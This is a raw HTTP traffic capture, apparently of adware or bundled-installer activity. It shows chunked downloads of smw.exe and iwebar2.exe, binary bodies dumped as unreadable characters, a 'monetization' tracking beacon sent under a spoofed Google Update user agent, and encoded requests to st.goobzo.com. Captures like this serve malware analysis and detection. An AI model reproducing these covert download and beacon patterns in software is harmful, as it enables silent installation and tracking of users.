    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 3250000-3499999/5194096
    Age: 69526
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Whei_YxPtnyOjloskS9pG-Vdx8c9XF1iYt1f0Voh9_i0KLzCZ5Lqtg==
    \Y.g. ?f....GD.^...Iu.}ha...O.u....ir...............:..n.<..ryf../.
    . j&."k.._.}P...{}.^..../.8..........\...n.=1d{...;.....1... ...gc.>
    ;&s.........?RA.2u..J.s.5.. .V.._._.>..!...X}U..V.jN&j...m.. @..~Q.
    .....v..M..x...rAu.c...0.........P./.':}.U..ct.ft...4.O..<.OeF...0.
    q.....t.(p..........|...!.9..j...%.m..7..5J_D*....9kI4...bDE2..Pg.)F..
    ....5..4"2....A..9d.m...."..*.i...Q.. .~...].uMv... 7...#.]T..m:.}7...
    Y...rF/...p...a.nb......j....6~.<.oj.|..0)...Z.d......Q.,....w..5!o
    .x.L>l_..B.....W.$V%.d .4.......#..#?f.5x.d...;}.n.vl._.M..Y...R.E.
    T.y.~..T.nGf.p..W.c.....<........%.. .....8..Q...$Q.q.vAE...0^.._:E
    ...Q..H....~%.)V.y.X..dy.s]8..05^.:x...3.v.......I;..jk..:-.G.....I..z
    EoF.#.......Z9.f..T..C.|K..........t/...Y..0u@....:.D\g..-c.......S.Er
    [email protected].......'}..T...._....s5........(f...h...\xb..v.K...~.0.9.
    ..6..|..B.X.l.k].!...M.....k.}-W [email protected]..~m.4.... ...Ung .^.s.N
    ......c..r=....,...a;...RKn...[%.6...i......%.7..#.7..l....#O.>..#0
    ...._P..&....S,V..x`....S...v.b..V&?..Gf#....8...pVZ.$.Q.~....!c.....`
    ...j....\b.-......s....".....B..{.Cn.l.a.~..Z...>....-%V....QC,....
    nL..^....3W......-.l#.}&`...]..?b.7..X.P...........5.........M....J.,.
    4.. ..}.....$........mw .DM.....ee....?I.J0.E.L....$.^H..T......[...o.
    .n.....F.w.G].|..r.4r'..b.n...;..=`.=........s3........6.q...7./B....#
    .I jb.E.x..4?0N..ZIsP....N...,........q.......A:.M7..k:.2Q..].._......
    .i.....z]..eW.\.X.P".bM.%....pnj.v.-Y...Y..f35Uw...>;"km....}....K6
    ..A.F?.B..f....}.Lc.d6.$..........nxw..C.[>.B<D..a.7&... e.

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=3750000-3999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 3750000-3999999/5194096
    Age: 69529
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: jw1htUB616jNtqpgWznVlWmHL1uazLWBA-ANGNS0X1m-XuZeaX_yGQ==
    n.d.ba\.,..-.. ........^c..T.?..[V..M.[wpNp..ly........s..&...........
    .u..'...Dz...........z..\.....wX.xv.........2.......3`..x.e....|..2:.w
    ..u.....wQ..(.]....}....r.E........c{....r.C............Zq;.y....'....
    .<..... .]...'......}<....}~n3.L^-.I...t1<......4..|=..|yH..}
    VOV%...%.....zjY...c....%....`.)a....H.q..@<...'.U.e.-..`...B|.....
    .....?.....m....v.{.......W ......Jk.v.Y1..fm.vi............@p........
    ..._....P...... [email protected]..`.......2......zJG.2$re....oA.W".1
    ...D.65..*....rq2.r.....I.......q.G.}=B}=...ak(W....E...0!W:..!. ..X.x
    .......\g%r..6.Ka....r)mM....U*.W)........}...J.r.W5. [ W.-......Q...\
    .(.:.[..E|[email protected]...#..ho..G..u...j.|..E.V.u.L
    .....>...Q...K.....>W./\wY....kP^..*.h....a..-..... ._...M..2:..
    .6.:.f.p.&...|....K...n...X."I.K$..3Qn....I.k..'.4..POD...c...?^O.o.2.
    ...0..........G...2C=jk..1.....L..t.#2...)e.......|;..=.^.5..;.?...'..
    .'.w.......}.2...&......D.....].H......^.H...RC}..4.wIMC}s...-.e.oE-^.
    .5....L.o.w.D.%.}....m.O.=...J...K....{...[V[f`s...mn6..Mm..&.'...D...
    D,......P.h...w....k(..#....O..E.........%.?........v..'....".......5.
    ..t$w..cX.L.a......\9oW].....M..e8..I..2q.....7.2Vo=.....mq..y..<.u
    ..-.._oJ|.Y.t.iQ.d...(..26....-..-.......z.E...O..v.'}}.... ..k|..{.:.
    .d.....".'..z......2.e X.L.8.......2..D[I...L..f..a.2.......^.S.^.S...
    .S.#>..YY....F..........}`b.A....Z..d.?E.........7 .R..s.....<..
    |._(..s..............gxv.....31..g...3....)....._j..*.O..O...@..$...1R
    ........71.!..g..DK....B...i...gv....D7 .;.M...s<o.\r..9..{.^..

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=4250000-4499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 4250000-4499999/5194096
    Age: 69531
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: u0Xc6nM9TkaSdJWeKI2rY4v_ES40-eykfXqUizcXJ4D9um6m4hFV4Q==
    ...-<...8a....... ...h.3N...%..r.....Q.Gn..d...n...T.`..k...O...'..
    N...Z....n.". .S.}6%...wG}...`G.US..m...p...i..I.?...czjU.....:]..t9tz
    ..M.1.V.[fi...;..$.3.u.;.>E.(:....Gx~..P.v.]..y........".n..1..3..C
    x.....]..O7.h.....n.........)at..@m...:;P5t..Gi.j!......3<.....?...
    ...S....o..c..?.-..1o.8..]'.....:...1._..p(o..3.b...6Y..Ei.G...*..Q...
    .0.B@Y.)Y..7*...#P.^....;....#..j.....x....!...j1.L.GU'~.g....QJ....S.
    .~g.......k...w.h..q1..P....44...........^......!.ub.....RF.{......[..
    .KX...5r.....O...&..k.......v?|.f...S...0@L....%..f.....y...S.F.b{o...
    .>..y..j.............X......|@..%z..l.G..[.k.\e...i.N....HK...U...o
    .3.v..7h..M..O..?.72>...B..V1.m..r..7.....b..h..&..ix :.F..........
    oB[^(...v...&........@.........]..P:...U.Y..)':.l.k....h3.f......r...G
    )?0.._.....4.I..<..0...}C.e*H.>;..~..i.'.......wa...|..P.[..K..b
    0WbHz.vs%.F,.X{..>...............y... ...kB........h...9..../..^&.$
    L.2.W..YkH.I.P.%[email protected]..,.......[......'%xn...3.e...V....n..0
    9.K.|...fH..x....... .....Li.......>........;[email protected]..:...m..
    c.....:..d~...{..J5...qC........'`s.z...=}...X=.^...HL.E.*1....rW..&..
    ......J).{.z....l.A..Y`u..qb.......X..G...... ..fS.'o`..i...... A...4K
    .E.[0].R.H .6.CZ.....3O.3........2[w...R._.F..3h...f~c.yT......Mt...&l
    t;....y...~}...c...0.o^x.Q..aQ..eh/."..=.....{q..?..C..9.....I.6z.....
    \.}.....;1._z2n........0....H....&O.R`.[....&.1ox.s....&..}YH....{2...
    .......R..t"o].....`baw.._ik:EzVgP.T...#..I.]......Y...U....0... ....1
    W...v...[d}m......6O..V..AKw.......L..l..A8..n......9..%.I.e.'S...

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=4750000-4999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 4750000-4999999/5194096
    Age: 69534
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: fgKMSm0JU8Dz1r_Yb6E10o88gd0-tGGGlfjzRmLbe_m83Wfo4p0yOQ==
    z.C.&[..9...!.~..k...~.N...x.;yG..K..C.i....:.&.........7. ....#"../..
    ....f......G....I.0.a.z.}... BZ.^<.o9...TKojj.C.9...:z.n.)..^zR'.a.
    3.#..........b..5......9....N.......wT.s....E..t.`/.#.<Iu.....'.BL)
    .C[b......N.8..... ..AB....%.{$#(WE..c..&..4$....,.).A1.....`r.i.H..I.
    ....q..Q......S..:....2]Z.$..Rs........,....i...|<...R'.........u.?
    ...,..C].}...J..ub...w.....L...H...!,.9....5v..1.17...{P.{0.,m....D...
    RD.W$6v...F..'...6.cJ.........`.g...U.Y..C...A.F...CE..}.)...$..B...:.
    :.?v..1.-....X....l".....SG....d}G............u....H.*.........*...ZS.
    <....._.....k '.|?..Y`#....X.w..d...I......h...W..&..:A....$.)...".
    [email protected]...=./u.8.9.@A,k.q2...........L7..r.(?..R5.3....7?
    .....3S..}c..%....N.....&.V...r..?.....&......kI*.......JL.<.....4.
    b..8.N^..x.U......}....f>.4n.z/<?.&.......i.O.|&..US....p.g..Td=
    ..{ Ee.&QeW..............&.~..7.B.G..S/...:~&3.HK"..d=I.}.R...:....C.K
    2..r.......S..K.s.d:%....=%..'..Q..d..........bX.V.....M..`k.........6
    ..5.>.....A$....A...2...d.E.".../...8... ....r0........8]Gu...E.Qz.
    {..O..~O....jx..6...Q.b.....wj.q....`...[.j.*..[..X.r.A.....K.9v.4}-..
    .?.........tp..d.)...".YF....n.q]jxQf".H..7..I.g)WAA...EY.Z..;.I..J<
    ;.....Dx*.:..a.j<...Uo.~.. ..\.'H.1.1..(A...f/6./.`..@.{j.Qc:..I..$
    ...0....<;t..s..9...s`*[email protected]:R..T......YDq'....L...74...
    .0...S.g......\l..i.D...!.A_.YG.".!r..../lzC..^....-..O.p?7...A3....R.
    Dt.y..V...J".i..JWzy"U=@./......Z..xh............B~_".Y%P..\...D......
    ........1.2.....o..e..a..NLNx.c.segV.=I...'.e?...c......c./1,W..H.

    <<< skipped >>>

    GET /monetization.gif?rand=24808&event=7&agent_type=2&ibic=92F4CE5DE43B4200BD216411591F0444IE&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:31 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908131.dop018.am4.t,1401908131.cds019.am4.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 04 Jun 
    2014 18:55:31 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
    live..Accept-Ranges: bytes..ETag: "1344239556"..Last-Modified: Mon, 06
    Aug 2012 07:52:36 GMT..Cache-Control: max-age=86400..Content-Length:
    35..Content-Type: image/gif..X-HW: 1401908131.dop018.am4.t,1401908131.
    cds019.am4.c..GIF89a.............,...........D..;..


    GET /t.ashx?e=jJl6mEdycnQ 8U9Mk34kw1YtpnRz6OBdQF3UKsSdb2sOPTZ1h4Q6LUVho8rxvim7NGnZb0Aap XZAzLabjw6T2AqR2XPWVGhi24b6K/4pIUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: st.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 2.0.50727
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:16 GMT
    Content-Length: 13
    abfgshdgfjhsk....



    GET /t.ashx?e=jJl6mEdycnQ 8U9Mk34kw1YtpnRz6OBdQF3UKsSdb2sOPTZ1h4Q6LUVho8rxvim7NGnZb0Aap XZAzLabjw6T2AqR2XPWVGhi24b6K/4pIUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: st.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 2.0.50727
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:16 GMT
    Content-Length: 13
    abfgshdgfjhsk....



    GET /t.ashx?e=jJl6mEdycnQ 8U9Mk34kw1YtpnRz6OBdQF3UKsSdb2sOPTZ1h4Q6LUVho8rxvim7NGnZb0Aap XZAzLabjw6T2AqR2XPWVGhi24b6K/4pIUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: st.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 2.0.50727
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:17 GMT
    Content-Length: 13
    abfgshdgfjhskHTTP/1.1 200 OK..Cache-Control: private..Content-Type: te
    xt/html; charset=utf-8..Server: Microsoft-IIS/7.5..X-AspNet-Version: 2
    .0.50727..X-Powered-By: ASP.NET..Date: Wed, 04 Jun 2014 18:54:17 GMT..
    Content-Length: 13..abfgshdgfjhsk..


    GET /iwebar2.exe HTTP/1.1
    Range: bytes=250000-499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21869
    Content-Range: bytes 250000-499999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 6GvEBm7qcQPBPyAGaTfhe18auLlX40UHB1sKjrA7VKBMiPT-lhV-7Q==
    .y.,..,w<.).J.lz.B.T=....[.`..K..y.v.;$}8..#.......o%.P*.{6O~v.6...
    c..9.N.H4..VA%.C.9~....y.#... 1>M.*T..\. .E......$.\. T?.eY..F.fp..
    (.S... ...._..A.L;9J...N.......f..].^k...=.F.Ks.M.....x.J3.-.y.N...<
    ;""..;5..b....."...C.he... ...=..0..v2%l..b..lN....H...(:.K...!a......
    ..V..Q....6.`.g......./... ....|a.)^.x.G.tu_e...N...0I..........{.-N.#
    H.....O....x.K..X............n...........<....PD^.:........m.....}J
    ...}..?.[[email protected]...<.M'.U....>.w...E6..(...b8...o.'.o
    ....j^).....".........R.J....)m....[@.g!.2.1...!$..#`.p......O-.s..v..
    ...D.........F.w7.k.*[email protected]>....i/.......>
    ;..n........m..._R"..8..F.N....o.V.......-....;.o....mr=BC.b....'.o...
    T....o.<..Y.U.r.}..E.\UI....k......Z2..G^..u.l..i...rFZw..T....$...
    .g.rX=.JoA0.:\[email protected]%@..T..`.E..*.O-u.5l.q.`
    ^..w ..:(...B...HX......%5W.C..u.UI....6.`.....l.]....c.5b...].I...)..
    P;.og...V....p.ho.\...)....Ta.......WP..U.d..w....{.....Q..`.L......."
    ...7....C..A.v<.`.=.x..{.%...6.j.?..^O...-o.E.0k!........P&\...57.]
    .709y..............\.s2Q...Ff.f...?........7|c.e;...v...f......#."....
    .>.h....]...u.j.....LT..X2....[zV.O...'1..M.....H(..|.....{i.. ....
    k..WPDk.n).......9.C....,.$(...".^.X.R..r. ./wA..[3..d.J0..i^...B..X..
    MS...i{...j.\...2.P"D.;*.../%....^..O...$S.~..&`&...QAj&8i......&..9.p
    [email protected]......[DE.b.7cW..Z.0.....D[...A......@....=
    A.\...YT;..].\.k...x6ma.........s...`.....}[...R.s._.......}$.1cV.Q...
    .R...mb.s@Y...\.y..t{oaU...%...[M.. ...X..`. ..yi#0z.rDT.K. .....W

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=750000-999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21873
    Content-Range: bytes 750000-999999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 1uJsOkCTArgx-7O2PcOBUuZH17spAX_CDCIO4QSL08THh0YNKpVpXQ==
    ....M....>.....&.*c.@F...|..F.aB.YE.lQ.;........N...4...k.....Q.:..
    ..$...@..!.][email protected].....)N. ~>... @M.SNf.X.....}..B.\^..&gH....a..8
    .....{...e.......E.[J...{qZ...7n...p)b.=...au)A.C..5.......G..6QPo.L.`
    V.Nm..g.,.....c....Cz.=.mC.^.NS.. ...7...ni.8.....|......U.].........E
    .H....8Vm..h..61.'...e...$..&....z\.s.].K.......gg........O\f."..$....
    5..N.B..l/.\...9Q....n=.u0..mj......B##.[....|..E.~..A..e;.....7A.r.&.
    .C[.F]$.J...j/i......cY....A....._..p...v0o..2%...g...3.o....|..D...P.
    ....L..........<>%..).,C.*......4p.jz.Q_B.3M.P.Qo..R0'.e.,.wMm..
    ..4.A..t'k.V........!....>..{....S#6 I.mr.....^..3....(....e...%...
    =/....#y.d. .Cn.D.B..b..j.X_...-.3..&...l"...;z..h..*.....0.a.U.n@D>
    ;....j.......F.y........^.f..Q..j...qP.....9.......d'....."...(N..,..p
    .w...,.7<t.U...bL.....6.S......?...|..0o......N4.....S....b.[].xYm.
    .....h-$y...=...\.....9....L..k.r.Ay...j|...}..z.........C..%.'l...K..
    !L..>.-Ka.qb...P5>.>]`V..`\.>0.d..5I..".fx.i.oX.....[.....
    6.M,7..z.f<?...y..<....y...q'ou.2.;is..O..J..Q.|9.~......WA_=...
    W....<:.9.a..~@(...:}......x@.=.....1X,`.<l.Y.n]zE.:. .......s*~
    ."...94...q...G........$..i.....;.*...._...'.x.q..F.a 7v..'.w.'.....(.
    [email protected](*.9..P..`K;jL.......D...D....S]..Y.....t..?,.(
    .[........C6.....<.i]N}.~..%k.Q....e....pb.V..c...........(...Q.oX.
    41e"}...l.y...e.e6it..K.n.\/d..S..4s..".lr........m.. iO...ojV#......[
    C..f.f..G .....Cz>..u...f@..}.c[u..9E...{.*.60.k...!V...<.......
    H.#....dG..t.......y......"i..tw.2...L.<.j.#..LK82...[ILP?_. ..

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=1250000-1499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1250000-1499999/5974736
    Age: 21877
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: RkmMHAiwS4SKQa37_0JZSby5971HtQi6uZZeXhs7e47QcIeuQtKJVQ==
    ..P0..wj.....0.D.Z..X8.O.........T>..p..N.s..d....'[email protected]
    n..]..K.R...Mh.i.p...C..^..:..].'..z..8..}f..Ps.._VU.R..._...Z.....p..
    ...nc....f.oi......~.K......t...Gi._.l"G<....5H.R.c........v ..uo..
    .......}MZ.u.h..NW...!.Z.-..,r.......".$dtZ[R...Xo..70...{...<...@.
    \..Q...6.C..>.....[..%..g..d.Q.I......)>4.|8bA.dQ.....LTx..Yhl:
    G'#j5G!.|r......y.2&l....r.....>..9.......Z.......p.k.q..k.E[..P?&.
    ....sw.3*. 7./.....g..G...>......!....{K.7..r.oGp.. .....8......08.
    .z...4......*.<...d.70R.QP..."T............>Q......'...s...'v7M.
    _a...5.C.E.q|!`..........p.&)Y`...;...vg...;A.9T#t.w>. [email protected]&:;...
    .w0ta]*!.6.*....uu.....#*k...0*Pu....#L.0k.....2t...;j6.......M.......
    .....(G.....|......5. 5i:..DT;Q...l..[ .i...x...A.....|a..b.\.O.......
    .SN.Qf.%..I.........}........"..u..'....,.$.}.....Q(......z..q.i,.rv..
    BRi.x.0.N..t..`3.T..nSY.}.p..[. ..Qv...p=..9w.8.F...|.......?..i\.....
    .....i....#O...K..tT..t{.<..0....2..|.\...T....IMd..H.Y...i. . .9..
    ...J...h...}.h[.....L.....%z..........g.......Obp.7.68...,.g..;..3..rH
    ...U...t^........./..}......C....O.r.*i,P......a........Q....{t..S...B
    b.k.{.Y;..R..mx .4.....b.V.....]r.7.oFwK{......&C..x.Bn>...v.%..&..
    ....?.9~V...O.k.W..'.;2....FL.....*.[[email protected]%[.d.&..tD
    ...HG[.....U.&=q.8q4....a.....s@....;[email protected][...md..
    ..i1....n.}Ug..3..o..O..<...u...v.aK.w...at.9..,TVr.l..%:......Z8GE
    ].\......q...c?.,G.........,`..C..N<.qC.|.k....j...>2 ..?....pK.
    .o..3...{...f.xe.N....].r..E.Z.Ie'..% ....r........;l....c.)$7...H

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=1750000-1999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1750000-1999999/5974736
    Age: 21881
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: idtGJYwuMyUc7byT-5Bt8g3G6uq6CfLMrRNeD8nHtznWC6byamD4sw==
    Er..?^...|.8.j..u.o.h../..I./.(:b?.[..6..3.....p9..W.H...@T...........
    ...S....?.C.....^TE..xF..`..V.K.....h.g..(.<NW..~.Vl.Q`r.u.....wO?.
    $...p.s.x.i......^p...O......o/J;.r..P{c...u.v.......u.&.....{..Tm.p..
    .E.(1..o..k.e.Q.......`V.(..{...4.......^o..AO?z..(..P..Q....>`6...
    .....,...`.....k....1...z..m...4?C...i.a......}]p.........M...h...,..4
    ......O.ym..7t0...g=..U........;.].C.`...2K...Y.:4...[F. v...b.....z.p
    ...0\E.e.u.w.L.Z...|[email protected]..>..f..
    l.. ..u8....D....$m.)........V;3:.....Q.......#.mF^.M..b`.~.... .....5
    Y....;>........N..?.......9H`....z.....'.=R..5*.j..--.k.p.VD2G..&.,
    ,0.B......t.^h.Bq.....D..._x..]#.ZO.....=.<n^<0.K...{S.. z..^..!
    ....s...n..J.]......a..:(.....s. .n.nO..6.VxL............A.{[email protected]
    .....^.N.j.$.......-.H...;(R....B..c..]......[...S.z.K(O..s......"...~
    ..L.{~....Z..N.../.Q..l....--^.-...X.0Vd.-.W.c.ci...xj=...j.....e0..2.
    O...........C&#...........m.D.5..S...Uvy.O........Yf.x.&.!.t..K.....V.
    g....9.....A........b.........-.?|-\.."up9......#.Y..r.L.G..L*....d.].
    ..L.0c.gh..&...w.C..ig.n...l...\,=..T.....g.O..I..n..U........H.jb..X.
    ..........'...............Q...2... /..ao...J...(R*n....S.P.....2p.z%.
    ..%.n..y....aO.PK.bO...A..l..0.Ks....B..._~A...l...%......6{>m6w...
    a.>.....z....&.6..NZ...$.Nmw......]r...r.4)m_.^a.& .C..AW1.9if.....
    ;\cM.....E.Wo.&..........FO..,l....o.. . 3G#{|...M.=....=.v.t...j.?:..
    .s..b...hbI.P..F.5K...k...1...6.......g..ye.....{Gl...R/dP9i......;...
    U....Q}fU..%>x3.fq:...U..&7...Z..8...3.q..c...T.....*.ix.M@L../

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=2250000-2499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21884
    Content-Range: bytes 2250000-2499999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: NUQZH7wfu1WjlMy6aemWzHyh9tSlU7qQcBw9mR052BmE87Ea2nQBJg==
    .?F..b_B..B...N.A..l.,[.....?M....[...hd.].xb.4.D.T...8@I. D.f.....&..
    .N.e]3.../.....9........&D....]K.#..>...9....g...E..kH.....B.......
    .$=.'...%..N.(..~.e|......2.e..Hb....2....u_...6.._UV.En Y.(....}..4.p
    .....47.B).....,....d...2...46..M.T.E...!..P..s.p,.....0......*}.Pf...
    ..}./0E.....bv.t....(&...x;..]p.a..=..3...5....OJ...9.\.#d..........._
    CA.Q......X.G...U.M.e6<.a.n`....^.}4..%.Q.......H..>[..~b.b,...j
    T ...'..-R% .}..|.5..wX.U'/."....!.b.Y.....NF8^@.9N..}..5..w.w.P$&P..X
    .D...B.d~..$..>N.x.... ....li.{E=F.....Tx...T.Dtx...u2)..&..o......
    .....h...Nv.4..,....G)...V.....X.-:H...../@..p6....p..2.fE.{:)B.#...|.
    1...e..'N..}...>%C;E.....T<2p.....b.......t.)&E.S.(...bKkx.<.
    ......4......\j.N<[email protected]=1.H.,U.;.pxs.....A..ZeF.S....H.:.[v.
    ..j'..40......Z.:....T..k. oo.#3.5c.{..............O.h...rVn... ....w(
    .|....W...|...pn.b.....LH.(.q...7.(F.e.r.a.ya....#....t.....$^..Xm.l..
    S.......\.......DN.m....w,k.T...L.Z.\.V.Co..4.P.......`.......k..a...P
    ...B1....)..C.R:.^...4Q(c...$p...?:.$.o.......)...T..([email protected]...
    F.............8...}n.h:.k.......&9.3?. W.f....H......p...M........g.;X
    .[..{%....k..../......?X.$.R...-..#.;2.y....B...........K.E..!..O.=&.l
    I. 9...'.....(.!.c8.....?.3.9NY'.$...$."mv....MH..~......//.o.r...=pJ.
    ...tP.GTo.\..4..\..EX.:..$...f..h .K."...B#I..o..`..=EfT..|.R.....(s..
    ..`...../T...K......../.......)tW..../D..2......#..\C...7...........w.
    ...Z..iw|...:..s>D..3=.. M.. j5,..ov.2... ...."...`..=......yt..h_.
    .2..NY..*.p....r..G..Atp......./.....X.~Q.}..*r.3.o..H...,......w.

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=2750000-2999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
